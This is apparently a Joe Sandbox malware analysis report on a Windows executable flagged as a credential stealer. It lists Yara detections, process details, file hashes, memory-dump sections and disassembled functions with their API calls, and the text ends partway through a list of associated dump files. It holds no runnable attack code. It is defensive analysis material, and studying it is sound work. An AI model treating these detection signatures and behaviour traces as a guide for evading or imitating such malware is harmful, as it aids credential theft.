Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2129877489.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2129358643.00000000017E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:13:21
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe"
Imagebase:	0x3d0000
File size:	2'720'768 bytes
MD5 hash:	20660C078959F3893C738609A956DEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Function 017FC109 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2130001247.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Offset: 017FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_17fb000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc62c95cd3881b8fadfa2b4658520540f84d12120e5653539f7b059ec610f715
Instruction ID: 66daa307219093ab9f4ce26695df860497db693446ff05e752c1424df6e809c3
Opcode Fuzzy Hash: dc62c95cd3881b8fadfa2b4658520540f84d12120e5653539f7b059ec610f715
Instruction Fuzzy Hash: AD510B3600E3949FCB27CFB4D991A86BFB0EF07310B2844DED4808F263C221A54AC796

Analysis Process: 02FQBW3AYVFKS8DMY3O.exePID: 1412, Parent PID: 1400COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	25%
Signature Coverage:	5.6%
Total number of Nodes:	36
Total number of Limit Nodes:	2

Executed Functions

Function 0056E4DF Relevance: 1.4, APIs: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 0056E4DF

Memory Dump Source

Source File: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 81bed6cf89018702c265b37972ccecae764fd3688e7254457551df95608287aa
Instruction ID: 2516e8a80f00f871a8581a5f2581889c6148ffac8c96eb65847f8d1fcad64bac
Opcode Fuzzy Hash: 81bed6cf89018702c265b37972ccecae764fd3688e7254457551df95608287aa
Instruction Fuzzy Hash: D441C3F651C300AFF705AE19ED8167AFBE4EB84324F25492DEAC5C3600E73549448BA7

Function 00559741 Relevance: 4.6, APIs: 3, Instructions: 66
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0055C99E
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0055C9C5
GetNativeSystemInfo.KERNELBASE(?), ref: 0055CA1C

Memory Dump Source

Source File: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: 314be940c43c4699942ab506a6a01a43cf9ef39dcd12a83a313b70534ddd42c1
Instruction ID: 71b24d6c3a6e20d891a31698f1398c7ddf9073c98927b8c394149c57140a1076
Opcode Fuzzy Hash: 314be940c43c4699942ab506a6a01a43cf9ef39dcd12a83a313b70534ddd42c1
Instruction Fuzzy Hash: AD21157210428EAFEF22CF60C949AEF3EA5FB04316F514526EC4286951E7764CA8CF19

Function 0054FB3B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Strings

C, xrefs: 0054FE2E

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID: C
API String ID: 823142352-1037565863
Opcode ID: 2b0c89c4e6f3b9bd1b76823960d821a6d26a7c13b87c6089d9810df097a6cd63
Instruction ID: a01e4bef025536007092c2b0ce0f3deda56cf35cd260edd54c624eb270b55e7d
Opcode Fuzzy Hash: 2b0c89c4e6f3b9bd1b76823960d821a6d26a7c13b87c6089d9810df097a6cd63
Instruction Fuzzy Hash: F4415CF710825A7DB701CA59AA64DFF7BACFAC6738730883BF806C6902E2554D196335

Function 0054FDB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,B4FA4026,00000003), ref: 0054FDBB

Strings

C, xrefs: 0054FE2E

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID: C
API String ID: 823142352-1037565863
Opcode ID: 5f1342f96894133919d003cb83cace8ce1af3f227dd127242928d5f8c68d4f4c
Instruction ID: bb8cbfa0de6b92650f4fbfef5ce3660424a941f8128e12bdaeb99ab3c9869e58
Opcode Fuzzy Hash: 5f1342f96894133919d003cb83cace8ce1af3f227dd127242928d5f8c68d4f4c
Instruction Fuzzy Hash: F13108B750C2966EE7018E286A149FF7FACFAC2339720887BF401C7557D2264D199335

Function 0056FD36 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 0056FD36

Strings

r&_{, xrefs: 0056FE57

Memory Dump Source

Source File: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CloseHandle
String ID: r&_{
API String ID: 2962429428-642147446
Opcode ID: 088e5612618253b3cd532f439d9e75c049487fe6ffd30cb5ffba0acc112ef6f6
Instruction ID: 743382a67b281add117f296d7772222b269a313d149e048f3f7dd38bbbbe2230
Opcode Fuzzy Hash: 088e5612618253b3cd532f439d9e75c049487fe6ffd30cb5ffba0acc112ef6f6
Instruction Fuzzy Hash: 8F31F7F250C610AFE315AF59E8856BAFBF8FF58310F12482DEAC5C3610D67558448BA7

Function 0054FAC8 Relevance: 1.6, APIs: 1, Instructions: 128
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
